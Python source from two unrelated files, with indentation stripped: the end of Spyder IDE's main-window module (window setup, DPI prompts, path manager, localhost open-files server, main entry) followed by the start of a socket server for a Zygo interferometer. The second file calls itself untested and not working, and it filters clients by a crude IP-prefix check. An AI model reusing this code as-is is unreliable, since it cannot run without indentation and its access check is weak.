files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_id, plugin_instance in self._PLUGINS.items():
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin, plugin_instance in self._PLUGINS.items():
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance, Plugins.Console)
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin_instance.get_widget().toggle_view(False)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_
("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > Application > "
"Interface</tt>, in case Spyder is not displayed "
"correctly.<br><br>"
"Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.layouts.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.pre_visible_setup()
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
connectzygo.py
|
"""
Main function for setting up a Zygo interferometer as a remote server.
Not tested at this time. Module is not working!
Author: James Johnson
License: MIT
"""
import socket
import numpy as np
import time
import os
import logging
import threading
# setup logging for debug
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
fhandle = logging.FileHandler('socket.log')
fhandle.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fhandle.setFormatter(formatter)
logger.addHandler(fhandle)
logger.debug('Starting connect4d.py')
"""Setup the Interferomter as a Server"""
padding = 8 # max number of digits of message length
class InterferometerServer:
def __init__(self, host_ip='127.0.0.1', port=50001):
""" Server Object which creates a listen on a separate thread"""
self.host_ip = host_ip
self.port = port
# self.alive = threading.Event()
# self.alive.set()
logger.debug('Starting InterferometerServer')
print("Starting InterferometerServer")
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.settimeout(200)
self.soc.bind((self.host_ip, self.port))
def listening(self):
self.soc.listen(1) # only connecting process should be on the line
self.conn_handle = threading.Thread(target=self.handle_connection, args=())
self.conn_handle.start()
def handle_connection(self, remote_network=False):
""" Print a greeting message and wait for signal"""
#print('in _handle_connection()')
while True:
conn, addr = self.soc.accept()
logger.info('INCOMING CONNECTION FROM: {}'.format(addr[0]))
print('INCOMING CONNECTION FROM: {}'.format(addr[0]))
# print(f"Incoming connection from {addr[0]} port {addr[1]}")
# Check if external connection and refuse if remote_network is False
if addr[0][:3] not in ['127','192'] and remote_network is False:
msg = 'CONNECTION REFUSED'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
break
# Send Length of Message then message
msg='CONNECTION ESTABLISHED TO INTERFEROMETER'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
cmd = conn.recv(padding) # message length in DEC
cmd = conn.recv(int(cmd))
logger.info('RECEIVED COMMAND>> {%s}' % cmd.decode())
print('RECEIVED COMMAND>> %s' % cmd.decode())
if cmd.upper().decode() == 'CLOSE':
msg = 'CONNECTION CLOSED. SUCCESS: 0'.encode('utf-8')
